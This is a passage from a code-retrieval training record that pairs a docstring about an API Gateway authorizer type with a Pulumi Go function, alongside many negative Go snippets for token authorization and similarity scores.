{\n\t\treturn\n\t}\n\tpath := api.Authenticator.GetHostPath() + api.DesignAutomationPath\n\tnickname, err = getUserID(path, bearer.AccessToken)\n\n\treturn\n}", "func (b *CompanyAgedAccountsPayableCollectionRequestBuilder) ID(id string) *AgedAccountsPayableRequestBuilder {\n\tbb := &AgedAccountsPayableRequestBuilder{BaseRequestBuilder: b.BaseRequestBuilder}\n\tbb.baseURL += \"/\" + id\n\treturn bb\n}", "func (o *Object) ID() string {\n\treturn o.id\n}", "func (o *Object) ID() string {\n\treturn o.id\n}", "func (a *Agent) Id() string {\n\treturn a.id\n}", "func (cl *Client) ID() models.ObjID {\n\treturn cl.domID\n}", "func (b *OfficeClientConfigurationAssignmentsCollectionRequestBuilder) ID(id string) *OfficeClientConfigurationAssignmentRequestBuilder {\n\tbb := &OfficeClientConfigurationAssignmentRequestBuilder{BaseRequestBuilder: b.BaseRequestBuilder}\n\tbb.baseURL += \"/\" + id\n\treturn bb\n}", "func (u User) ID() string {\n\tif u.IsAnonymous() {\n\t\treturn \"user/anonymous\"\n\t}\n\treturn \"user/\" + string(u)\n}" ]
[ "0.68417984", "0.68417984", "0.664459", "0.664459", "0.646249", "0.63702404", "0.6350375", "0.62945896", "0.6247671", "0.6209772", "0.6209526", "0.6188234", "0.61318105", "0.61301976", "0.61273354", "0.61212593", "0.60999155", "0.5993974", "0.5949995", "0.5914038", "0.59029347", "0.589558", "0.5893801", "0.5887428", "0.58859193", "0.5858689", "0.5857153", "0.58557", "0.5838176", "0.5800357", "0.57889533", "0.577366", "0.5763353", "0.5737642", "0.5728399", "0.5720174", "0.5697934", "0.568524", "0.5684896", "0.5684259", "0.5682227", "0.56698793", "0.56612456", "0.5642646", "0.56409305", "0.56351686", "0.5611662", "0.5608348", "0.5607173", "0.559045", "0.55884504", "0.55869687", "0.5586817", "0.55850923", "0.5577101", "0.557643", "0.55756825", "0.5572302", "0.55654854", "0.55647343", "0.5564492", "0.5561364", "0.5559879", "0.55580926", "0.55558807", "0.5549848", "0.5549562", "0.55485064", "0.5543698", "0.5535004", "0.5532728", "0.5528863", "0.55240136", "0.5523872", "0.5520404", "0.5511753", "0.5510766", "0.55046135", "0.5500584", "0.5497167", "0.5496356", "0.5489037", "0.54857296", "0.5485422", "0.5475865", "0.54747325", "0.5474206", "0.54737484", "0.5467774", "0.54649895", "0.54603875", "0.54597276", "0.5457967", "0.5455325", "0.5455325", "0.54514945", "0.54514945", "0.54477644", "0.5446696", "0.5443016", "0.54397243" ]
0.0
-1
The type of the authorizer. Possible values are `TOKEN` for a Lambda function using a single authorization token submitted in a custom header, `REQUEST` for a Lambda function using incoming request parameters, or `COGNITO_USER_POOLS` for using an Amazon Cognito user pool. Defaults to `TOKEN`.
func (r *Authorizer) Type() pulumi.StringOutput { return (pulumi.StringOutput)(r.s.State["type"]) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func Authorizer(ctx workflow.Context, evt events.APIGatewayCustomAuthorizerRequest) (err error) {\n\tauthService := new(services.AuthService)\n\tres, err := authService.GetAuthorizerResponse(evt)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tctx.SetRawResponse(res)\n\treturn nil\n}", "func Authorizer(userService userService, jwtService jwtService) gin.HandlerFunc {\n\treturn func(c *gin.Context) {\n\t\taccessToken := extractToken(c)\n\t\tif accessToken == EmptyToken {\n\t\t\tabort(c, http.StatusBadRequest, \"Authorization header is missing or empty\")\n\t\t} else {\n\t\t\tparseJwt, err := jwtService.ParseJwt(accessToken)\n\n\t\t\tif err != nil {\n\t\t\t\tabort(c, http.StatusBadRequest, err.Error())\n\t\t\t} else if err := userVerification(c, parseJwt, userService); err != nil {\n\t\t\t\tabort(c, http.StatusUnauthorized, \"Unauthorized\")\n\t\t\t}\n\t\t}\n\t}\n}", "func (o *CredentialProviderAPI) Authorizer() runtime.Authorizer {\n\n\treturn nil\n\n}", "func (o *ShortenerAPI) Authorizer() runtime.Authorizer {\n\n\treturn o.APIAuthorizer\n\n}", "func (this *BaseHandler) Authorizer(key string) string {\n\tvalue, ok := this.RequestVO.Request.RequestContext.Authorizer[key].(string)\n\tif ok {\n\t\treturn value\n\t}\n\tlogs.Error(\"BaseHandler : Authorizer : unable to get \", key, ok, this.RequestVO.Request.RequestContext.Authorizer)\n\treturn \"\"\n}", "func SelectAuthorizerByType(typeStr string) (Authorizer, error) {\n\tswitch typeStr {\n\tcase ServiceAccountKeyAuthorizerType:\n\t\treturn &ServiceAccountKey{}, nil\n\tcase WorkloadIdentityAuthorizerType:\n\t\treturn &WorkloadIdentity{}, nil\n\tdefault:\n\t\treturn nil, fmt.Errorf(\"GCP: provider authorizer type '%s' is not valid\", typeStr)\n\t}\n}", "func (t *Token) Type() string {\n\tswitch {\n\tcase strings.EqualFold(t.TokenType, \"bearer\"):\n\t\treturn \"Bearer\"\n\tcase strings.EqualFold(t.TokenType, \"mac\"):\n\t\treturn \"MAC\"\n\tcase strings.EqualFold(t.TokenType, \"basic\"):\n\t\treturn \"Basic\"\n\tcase t.TokenType != \"\":\n\t\treturn t.TokenType\n\tdefault:\n\t\treturn \"Bearer\"\n\t}\n}", "func (mc MSIConfig) Authorizer() (autorest.Authorizer, error) {\n\tmsiEndpoint, err := adal.GetMSIVMEndpoint()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tspToken, err := adal.NewServicePrincipalTokenFromMSI(msiEndpoint, mc.Resource)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to get oauth token from MSI: %v\", err)\n\t}\n\n\treturn autorest.NewBearerAuthorizer(spToken), nil\n}", "func (mc MSIConfig) Authorizer() (autorest.Authorizer, error) {\n\tspToken, err := mc.ServicePrincipalToken()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn autorest.NewBearerAuthorizer(spToken), nil\n}", "func (o *WeaviateAPI) Authorizer() runtime.Authorizer {\n\treturn o.APIAuthorizer\n}", "func (o *CloudTidesAPI) Authorizer() runtime.Authorizer {\n\treturn nil\n}", "func (o *HighLoadCup2020API) Authorizer() runtime.Authorizer {\n\treturn nil\n}", "func (c Client) authorizer() Authorizer {\n\tif c.Authorizer == nil {\n\t\treturn NullAuthorizer{}\n\t}\n\treturn c.Authorizer\n}", "func (o *DataPlaneAPI) Authorizer() runtime.Authorizer {\n\n\treturn o.APIAuthorizer\n\n}", "func (o *StorageAPI) Authorizer() runtime.Authorizer {\n\n\treturn nil\n\n}", "func (s *ClusterScope) Authorizer() autorest.Authorizer {\n\treturn s.AzureClients.Authorizer\n}", "func (dfc DeviceFlowConfig) Authorizer() (autorest.Authorizer, error) {\n\tspToken, err := dfc.ServicePrincipalToken()\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to get oauth token from device flow: %v\", err)\n\t}\n\treturn autorest.NewBearerAuthorizer(spToken), nil\n}", "func TypicalTagTypePermissionsAuthorizer(perms Permissions) security.Authorizer {\n\treturn &authorizer{perms, TypicalTagType()}\n}", "func (c *Cfg) Authorizer(resource string) autorest.Authorizer {\n\tc.mu.Lock()\n\tdefer c.mu.Unlock()\n\tauthz := c.authz[resource]\n\tif authz == nil {\n\t\tauthz = c.newAuthz(resource)\n\t\tif c.authz == nil {\n\t\t\tc.authz = make(map[string]autorest.Authorizer)\n\t\t}\n\t\tc.authz[resource] = authz\n\t}\n\treturn authz\n}", "func AuthorizeToken(ctx context.Context, clientId, clientSecret string, authorizationCode string, codeVerifier string) (string, string, error) {\n\tparams := map[string]interface{}{\n\t\t\"client_id\": clientId,\n\t\t\"client_secret\": clientSecret,\n\t\t\"code\": authorizationCode,\n\t\t\"code_verifier\": codeVerifier,\n\t}\n\tresp, err := mixin_sdk.Request(ctx).SetBody(params).Post(\"/oauth/token\")\n\tif err != nil {\n\t\treturn \"\", \"\", err\n\t}\n\n\tvar body struct {\n\t\tAccessToken string `json:\"access_token\"`\n\t\tScope string `json:\"scope\"`\n\t}\n\n\terr = mixin_sdk.UnmarshalResponse(resp, &body)\n\treturn body.AccessToken, body.Scope, err\n}", "func Authorize(w http.ResponseWriter, r *http.Request, next http.HandlerFunc) {\n\t// Get token from request\n\t// El extractor podría ser: request.AuthorizationHeaderExtractor o tal vez el personalizado TokenFromAuthHeader\n\ttoken, err := request.ParseFromRequestWithClaims(r, request.OAuth2Extractor, &models.AppClaims{}, func(token *jwt.Token) (interface{}, error) {\n\t\t// Como solo tenemos una llave pública, la devolvemos\n\t\treturn verifyKey, nil\n\t})\n\tif err != nil {\n\t\tswitch err.(type) {\n\t\tcase *jwt.ValidationError:\n\t\t\tvErr := err.(*jwt.ValidationError)\n\t\t\tswitch vErr.Errors {\n\t\t\tcase jwt.ValidationErrorExpired:\n\t\t\t\tDisplayError(w, err, \"Su token ha expirado, por favor vuelva a ingresar\", 401)\n\t\t\t\treturn\n\t\t\tdefault:\n\t\t\t\tDisplayError(w, err, \"Error en el token de acceso.\", 500)\n\t\t\t\treturn\n\t\t\t}\n\t\tdefault:\n\t\t\tDisplayError(w, err, \"Error al procesar el token.\", 500)\n\t\t\treturn\n\t\t}\n\t}\n\n\tif token.Valid {\n\t\tcontext.Set(r, \"user\", token.Claims.(*models.AppClaims).User)\n\t\tcontext.Set(r, \"scopes\", token.Claims.(*models.AppClaims).Scopes)\n\t\tnext(w, r)\n\t} else {\n\t\tDisplayError(w, err, \"Token de acceso inválido.\", 401)\n\t}\n}", "func (st *Store) Authorized(r *http.Request) (t *Token, err error) {\n\tvar v = r.Context().Value(st.ctxKey)\n\tvar ok bool\n\n\tif nil == v {\n\t\treturn nil, errors.New(\"Authorization Unknown/Not Processed\")\n\t}\n\n\tif t, ok = v.(*Token); ok {\n\t\treturn\n\t}\n\n\tif err, ok = v.(error); ok {\n\t\treturn\n\t}\n\n\treturn\n}", "func Authorized() runtime.Authorizer {\n\treturn runtime.AuthorizerFunc(func(_ *http.Request, _ interface{}) error { return nil })\n}", "func authorize(ctx context.Context) error {\n\tmd, ok := metadata.FromIncomingContext(ctx)\n\tif !ok {\n\t\treturn status.Errorf(codes.InvalidArgument, \"Retrieving metadata is failed\")\n\t}\n\n\tauthHeader, ok := md[\"authorization\"]\n\tif !ok {\n\t\treturn status.Errorf(codes.Unauthenticated, \"Authorization token is not supplied\")\n\t}\n\n\ttoken := authHeader[0]\n\n\t// validateToken function validates the token\n\n\tif token != \"jwt-token\" {\n\t\treturn status.Errorf(codes.Unauthenticated, \"Invalid auth token\")\n\t}\n\treturn nil\n}", "func (c *APIGateway) GetAuthorizerRequest(input *GetAuthorizerInput) (req *request.Request, output *Authorizer) {\n\top := &request.Operation{\n\t\tName: opGetAuthorizer,\n\t\tHTTPMethod: \"GET\",\n\t\tHTTPPath: \"/restapis/{restapi_id}/authorizers/{authorizer_id}\",\n\t}\n\n\tif input == nil {\n\t\tinput = &GetAuthorizerInput{}\n\t}\n\n\treq = c.newRequest(op, input, output)\n\toutput = &Authorizer{}\n\treq.Data = output\n\treturn\n}", "func (Token) Type() string {\n\treturn \"token\"\n}", "func (ccc ClientCredentialsConfig) Authorizer() (autorest.Authorizer, error) {\n\toauthConfig, err := adal.NewOAuthConfig(ccc.AADEndpoint, ccc.TenantID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tspToken, err := adal.NewServicePrincipalToken(*oauthConfig, ccc.ClientID, ccc.ClientSecret, ccc.Resource)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to get oauth token from client credentials: %v\", err)\n\t}\n\n\treturn autorest.NewBearerAuthorizer(spToken), nil\n}", "func (dfc DeviceFlowConfig) Authorizer() (autorest.Authorizer, error) {\n\toauthClient := &autorest.Client{}\n\toauthConfig, err := adal.NewOAuthConfig(dfc.AADEndpoint, dfc.TenantID)\n\tdeviceCode, err := adal.InitiateDeviceAuth(oauthClient, *oauthConfig, dfc.ClientID, dfc.Resource)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to start device auth flow: %s\", err)\n\t}\n\n\tlog.Println(*deviceCode.Message)\n\n\ttoken, err := adal.WaitForUserCompletion(oauthClient, deviceCode)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to finish device auth flow: %s\", err)\n\t}\n\n\tspToken, err := adal.NewServicePrincipalTokenFromManualToken(*oauthConfig, dfc.ClientID, dfc.Resource, *token)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to get oauth token from device flow: %v\", err)\n\t}\n\n\treturn autorest.NewBearerAuthorizer(spToken), nil\n}", "func (m *AuthorizeMutation) Type() string {\n\treturn m.typ\n}", "func (op *AuthorRewardOperation) Type() OpType {\n\treturn TypeAuthorReward\n}", "func (t *Token) Type() string {\n\tclaims, ok := t.JWT.Claims.(*Claims)\n\tif !ok {\n\t\treturn \"\"\n\t}\n\treturn claims.Type\n}", "func (*MessagesAcceptUrlAuthRequest) TypeName() string {\n\treturn \"messages.acceptUrlAuth\"\n}", "func Authorize(w http.ResponseWriter, r *http.Request, authorizer Authorizer) {\n\tauthReq, err := ParseAuthorizeRequest(r, authorizer.Decoder())\n\tif err != nil {\n\t\tAuthRequestError(w, r, authReq, err, authorizer.Encoder())\n\t\treturn\n\t}\n\tif authReq.RequestParam != \"\" && authorizer.RequestObjectSupported() {\n\t\tauthReq, err = ParseRequestObject(r.Context(), authReq, authorizer.Storage(), authorizer.Issuer())\n\t\tif err != nil {\n\t\t\tAuthRequestError(w, r, authReq, err, authorizer.Encoder())\n\t\t\treturn\n\t\t}\n\t}\n\tvalidation := ValidateAuthRequest\n\tif validater, ok := authorizer.(AuthorizeValidator); ok {\n\t\tvalidation = validater.ValidateAuthRequest\n\t}\n\tuserID, err := validation(r.Context(), authReq, authorizer.Storage(), authorizer.IDTokenHintVerifier())\n\tif err != nil {\n\t\tAuthRequestError(w, r, authReq, err, authorizer.Encoder())\n\t\treturn\n\t}\n\tif authReq.RequestParam != \"\" {\n\t\tAuthRequestError(w, r, authReq, oidc.ErrRequestNotSupported(), authorizer.Encoder())\n\t\treturn\n\t}\n\treq, err := authorizer.Storage().CreateAuthRequest(r.Context(), authReq, userID)\n\tif err != nil {\n\t\tAuthRequestError(w, r, authReq, oidc.DefaultToServerError(err, \"unable to save auth request\"), authorizer.Encoder())\n\t\treturn\n\t}\n\tclient, err := authorizer.Storage().GetClientByClientID(r.Context(), req.GetClientID())\n\tif err != nil {\n\t\tAuthRequestError(w, r, req, oidc.DefaultToServerError(err, \"unable to retrieve client by id\"), authorizer.Encoder())\n\t\treturn\n\t}\n\tRedirectToLogin(req.GetID(), client, w, r)\n}", "func authorize(ctx context.Context) error {\n\t// Fetch Bearer token\n\t// In case it is provided and is correct, consider auth completed\n\t_, err := fetchJWTToken(ctx)\n\n\treturn err\n}", "func (a *Authorizer) CanAuthorizeRequest(r *http.Request) bool {\n\treturn security.GetBearerTokenFromHeader(r.Header.Get(oAuth2Header)) != \"\"\n}", "func (AuthInfo) AuthType() string {\n\treturn \"ucred\"\n}", "func (c *APIGateway) CreateAuthorizerRequest(input *CreateAuthorizerInput) (req *request.Request, output *Authorizer) {\n\top := &request.Operation{\n\t\tName: opCreateAuthorizer,\n\t\tHTTPMethod: \"POST\",\n\t\tHTTPPath: \"/restapis/{restapi_id}/authorizers\",\n\t}\n\n\tif input == nil {\n\t\tinput = &CreateAuthorizerInput{}\n\t}\n\n\treq = c.newRequest(op, input, output)\n\toutput = &Authorizer{}\n\treq.Data = output\n\treturn\n}", "func (c *Client) GrantType() string {\n\treturn c.credentials.grantType()\n}", "func authorize(ctx context.Context) error {\n\tmd, ok := metadata.FromIncomingContext(ctx)\n\tif !ok {\n\t\treturn status.Errorf(codes.InvalidArgument, \"Retrieving metadata is failed\")\n\t}\n\n\tauthHeader, ok := md[\"token\"]\n\tif !ok {\n\t\treturn status.Errorf(codes.Unauthenticated, \"Authorization token is not supplied\")\n\t}\n\n\ttoken := authHeader[0]\n\t// validateToken function validates the token\n\terr := validateToken(token)\n\tif err != nil {\n\t\treturn status.Errorf(codes.Unauthenticated, err.Error())\n\t}\n\treturn nil\n}", "func AuthorizeJWT (claimedRoles []string) gin.HandlerFunc {\n return func (c *gin.Context) {\n authHeader := c.GetHeader(\"Authorization\")\n bearerJWT := authHeader[len(\"Bearer\"):]\n token, err := jwt.ValidateJWT(bearerJWT)\n if token.Valid {\n // check the claimed roles match at least one\n } else {\n log.Fatal(err)\n c.AbortWithStatus(http.StatusUnauthorized)\n }\n }\n}", "func AuthorizeAgent(c *gin.Context) {\n\tsecret := c.MustGet(\"agent\").(string)\n\tif secret == \"\" {\n\t\tc.String(401, \"invalid or empty token.\")\n\t\treturn\n\t}\n\n\tparsed, err := token.ParseRequest(c.Request, func(t *token.Token) (string, error) {\n\t\treturn secret, nil\n\t})\n\tif err != nil {\n\t\tc.String(500, \"invalid or empty token. %s\", err)\n\t\tc.Abort()\n\t} else if parsed.Kind != token.AgentToken {\n\t\tc.String(403, \"invalid token. please use an agent token\")\n\t\tc.Abort()\n\t} else {\n\t\tc.Next()\n\t}\n}", "func (ccc ClientCredentialsConfig) Authorizer() (autorest.Authorizer, error) {\n\tif len(ccc.AuxTenants) == 0 {\n\t\tspToken, err := ccc.ServicePrincipalToken()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"failed to get SPT from client credentials: %v\", err)\n\t\t}\n\t\treturn autorest.NewBearerAuthorizer(spToken), nil\n\t}\n\tmtSPT, err := ccc.MultiTenantServicePrincipalToken()\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to get multitenant SPT from client credentials: %v\", err)\n\t}\n\treturn autorest.NewMultiTenantServicePrincipalTokenAuthorizer(mtSPT), nil\n}", "func Authorize(c iris.Context) (int, error) {\n\ttoken := c.GetHeader(\"X-Authorization\")\n\tif token == \"\" {\n\t\treturn 0, AuthError(noAuthHeader)\n\t}\n\n\tuid, err := DecodeToken(token)\n\tif err != nil {\n\t\treturn 0, err\n\t}\n\treturn uid, nil\n}", "func (cli *client) AuthorizeToken(token, verificationCode string) (*oauth.AccessToken, error) {\n\tvar rToken *oauth.RequestToken\n\tv, err := cli.redisCli.Get(token).Result()\n\tif err != nil {\n\t\tlogging.New().Error(\"failed to get request token from redis\", logging.Error(err))\n\t\treturn nil, err\n\t}\n\tif err := json.Unmarshal([]byte(v), &rToken); err != nil {\n\t\tlogging.New().Error(\"failed to unmarshal request token\", logging.Error(err))\n\t\treturn nil, errors.New(errors.Unauthorized, \"token secret not found\")\n\t}\n\n\taToken, err := cli.consumer.AuthorizeToken(rToken, verificationCode)\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"failed to authorize token\")\n\t}\n\n\treturn aToken, nil\n}", "func (b *BearerTokenAuthorizer) AuthorizeRequest(r *http.Request) {\n\tif b.Token != \"\" {\n\t\tr.Header.Set(bearerTokenAuthorization, fmt.Sprintf(\"Bearer %s\", b.Token))\n\t}\n}", "func Authorize() gin.HandlerFunc {\n\treturn func(c *gin.Context) {\n\n\t\tprovider, err := oidc.NewProvider(c, \"https://login.microsoftonline.com/5ab9af9b-4534-4c31-8e50-1e098461481c/v2.0\")\n\t\tif err != nil {\n\t\t\tlog.Println((err))\n\t\t\tc.AbortWithStatusJSON(http.StatusOK, gin.H{\n\t\t\t\t\"Auth\": \"Error getting provider\",\n\t\t\t})\n\t\t\treturn\n\t\t}\n\n\t\trawIDToken := strings.Trim(strings.TrimLeft(c.GetHeader(\"authorization\"), \"Bearer\"), \" \")\n\n\t\tverifier := provider.Verifier(&oidc.Config{ClientID: setting.AppSetting.ClientID})\n\n\t\t// Parse and verify ID Token payload.\n\t\tidToken, err := verifier.Verify(c, rawIDToken)\n\t\tif err != nil {\n\t\t\tc.AbortWithStatusJSON(http.StatusOK, gin.H{\n\t\t\t\t\"Token\": \"Invalid Token\",\n\t\t\t})\n\t\t\tc.Abort()\n\t\t\treturn\n\t\t}\n\n\t\t// Extract custom claims\n\t\tvar claims struct {\n\t\t\tName string `json:\"name\"`\n\t\t\tEmail string `json:\"preferred_username\"`\n\t\t}\n\t\tif err := idToken.Claims(&claims); err != nil {\n\t\t\tlog.Println(err)\n\t\t\tc.AbortWithStatusJSON(http.StatusOK, gin.H{\n\t\t\t\t\"Claims\": \"Error extracting custom claims\",\n\t\t\t})\n\n\t\t}\n\n\t\tc.Set(\"userEmail\", claims.Email)\n\t\tc.Set(\"userName\", claims.Name)\n\n\t\tc.Next()\n\t}\n}", "func (o MethodOutput) AuthorizerId() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *Method) pulumi.StringPtrOutput { return v.AuthorizerId }).(pulumi.StringPtrOutput)\n}", "func (authorizer Authorizer) Authorize(r *http.Request, i interface{}) error {\n\treturn authorizer(r, i)\n}", "func (auth *Authorize) Authorize(u *User) bool {\n\tvar responseType string\n\tswitch auth.responseType {\n\tcase Token:\n\t\tresponseType = \"token\"\n\tcase Code:\n\t\tresponseType = \"code\"\n\tdefault:\n\t\tresponseType = \"unknown\"\n\t}\n\n\t// If the responseType is \"token\", username and password is needed.\n\tvar postParam map[string][]string\n\tif auth.responseType == Token {\n\t\tpostParam = url.Values{\"username\": {u.username}, \"password\": {u.password}}\n\t}\n\n\trequestURL, err := url.Parse(authorizeURL)\n\tif err != nil {\n\t\tlog.Panic(err)\n\t}\n\tgetParam := url.Values{\"client_id\": {auth.clientId}, \"response_type\": {responseType}, \"redirect_uri\": {auth.redirectURI}}\n\trequestURL.RawQuery = getParam.Encode()\n\n\t_, err = http.PostForm(requestURL.String(), postParam)\n\tif err != nil {\n\t\tlog.Panic(err)\n\t}\n\n\treturn ping()\n}", "func (s *LoginServer) Authorizer(a Authorizer) {\n\ts.authLock.Lock()\n\ts.auth = a\n\ts.authLock.Unlock()\n}", "func (AuthInfo) AuthType() string {\n\treturn authType\n}", "func Authorize(obj string, act string, enforcer *casbin.Enforcer) gin.HandlerFunc {\n\treturn func(c *gin.Context) {\n\t\t// Get current user/subject\n\t\tsub, existed := c.Get(\"userID\")\n\t\tif !existed {\n\t\t\tc.AbortWithStatusJSON(401, gin.H{\"msg\": \"User hasn't logged in yet\"})\n\t\t\treturn\n\t\t}\n\n\t\t// Load policy from Database\n\t\terr := enforcer.LoadPolicy()\n\t\tif err != nil {\n\t\t\tc.AbortWithStatusJSON(500, gin.H{\"msg\": \"Failed to load policy from DB\"})\n\t\t\treturn\n\t\t}\n\n\t\t// Casbin enforces policy\n\t\tok, err := enforcer.Enforce(fmt.Sprint(sub), obj, act)\n\n\t\tif err != nil {\n\t\t\tc.AbortWithStatusJSON(500, gin.H{\"msg\": \"Error occurred when authorizing user\"})\n\t\t\treturn\n\t\t}\n\n\t\tif !ok {\n\t\t\tc.AbortWithStatusJSON(403, gin.H{\"msg\": \"You are not authorized\"})\n\t\t\treturn\n\t\t}\n\t\tc.Next()\n\t}\n}", "func getToken(r *http.Request) string {\n\treturn r.Header.Get(\"Authorization\")\n}", "func (interceptor *ServerAuthInterceptor) authorize(ctx context.Context, method string) error {\n\n\t// if the method has no \"route\" associated, it means that there is no role for it\n\t// so, just return to the caller\n\tmethods, ok := interceptor.methods[method]\n\tif !ok {\n\t\treturn nil\n\t}\n\n\tmd, ok := metadata.FromIncomingContext(ctx)\n\tlog.Printf(\"metdata incoming from client: %v\", md)\n\tif !ok {\n\t\treturn status.Errorf(codes.Unauthenticated, \"metadata not provided\")\n\t}\n\n\t// the token value comes from metadata[\"authorization\"] header\n\tvalues := md[\"authorization\"]\n\n\t// if the metadata has no authorization header it means that no token was provided\n\tif len(values) == 0 {\n\t\treturn status.Errorf(codes.Unauthenticated, \"authorization token not provided!\")\n\t}\n\n\t// verify if the token is valid\n\taccessToken := values[0]\n\tclaims, err := interceptor.jwtManager.Verify(accessToken)\n\tif err != nil {\n\t\treturn status.Errorf(codes.Unauthenticated, \"access token is invalid: %v\", err)\n\t}\n\n\t// for each role defined for this method\n\tfor _, role := range methods {\n\n\t\t// if a role matches with one comes from the token's payload\n\t\t// means that this token has access to this route/method\n\t\t// so, it is ok to proceed (just return nil)\n\t\tif role == claims.Method {\n\t\t\treturn nil\n\t\t}\n\t}\n\n\treturn status.Error(codes.PermissionDenied, \"no permission to access this RPC\")\n}", "func (a Authorizer) Authorize(rw http.ResponseWriter, req *http.Request) error {\n\treturn nil\n}", "func (a Authorizer) Authorize(rw http.ResponseWriter, req *http.Request) error {\n\treturn nil\n}", "func (a *authorizer) Authorize(method string, r model.Role) bool {\n\tswitch method {\n\tcase \"/pipe.api.service.webservice.WebService/AddEnvironment\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/UpdateEnvironmentDesc\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/RegisterPiped\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/RecreatePipedKey\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/EnablePiped\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/DisablePiped\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/AddApplication\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/EnableApplication\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/DisableApplication\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/UpdateProjectStaticAdmin\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/EnableStaticAdmin\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/DisableStaticAdmin\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/UpdateProjectSSOConfig\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/UpdateProjectRBACConfig\":\n\t\treturn isAdmin(r)\n\tcase \"/pipe.api.service.webservice.WebService/SyncApplication\":\n\t\treturn isAdmin(r) || isEditor(r)\n\tcase \"/pipe.api.service.webservice.WebService/CancelDeployment\":\n\t\treturn isAdmin(r) || isEditor(r)\n\tcase \"/pipe.api.service.webservice.WebService/ApproveStage\":\n\t\treturn isAdmin(r) || isEditor(r)\n\tcase \"/pipe.api.service.webservice.WebService/GenerateApplicationSealedSecret\":\n\t\treturn isAdmin(r) || isEditor(r)\n\tcase \"/pipe.api.service.webservice.WebService/GetApplicationLiveState\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/GetProject\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/GetCommand\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/ListDeploymentConfigTemplates\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/ListEnvironments\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/ListPipeds\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/GetPiped\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/ListApplications\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/GetApplication\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/ListDeployments\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/GetDeployment\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/GetStageLog\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/GetMe\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\t}\n\treturn false\n}", "func Authorize(c *fiber.Ctx) {\n\tauthHeader := c.Get(\"Authorization\")\n\ttoken := strings.TrimPrefix(authHeader, \"Bearer \")\n\n\tplayerID, err := auth.GetPlayerIDFromAccessToken(token)\n\tif err != nil {\n\t\tfmt.Printf(\"Player token (%s) parse error: %s\\n\", token, err)\n\t\tc.SendStatus(403)\n\t\tc.JSON(utils.FormatErrors(err))\n\t\treturn\n\t}\n\n\t// add playerID to context\n\tc.Locals(\"playerID\", playerID)\n\tc.Locals(\"token\", token)\n\tc.Next(nil)\n}", "func AuthGrantType() OAuthGrantType {\n\tif helpers.DeviceFlow() {\n\t\treturn OAuthGrantTypeDeviceFlow\n\t}\n\treturn OAuthGrantTypeServicePrincipal\n}", "func Authorize(o Owner, issuer string) (string, error) {\n\tsigningKey := []byte(os.Getenv(\"APP_KEY\"))\n\tclaims := owner{\n\t\to,\n\t\tjwt.StandardClaims{\n\t\t\tExpiresAt: time.Now().Add(time.Hour * 48).Unix(),\n\t\t\tIssuer: issuer,\n\t\t},\n\t}\n\n\ttoken := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)\n\treturn token.SignedString(signingKey)\n}", "func (ccc ClientCertificateConfig) Authorizer() (autorest.Authorizer, error) {\n\tif len(ccc.AuxTenants) == 0 {\n\t\tspToken, err := ccc.ServicePrincipalToken()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"failed to get oauth token from certificate auth: %v\", err)\n\t\t}\n\t\treturn autorest.NewBearerAuthorizer(spToken), nil\n\t}\n\tmtSPT, err := ccc.MultiTenantServicePrincipalToken()\n\tif err != nil {\n\t\treturn nil, 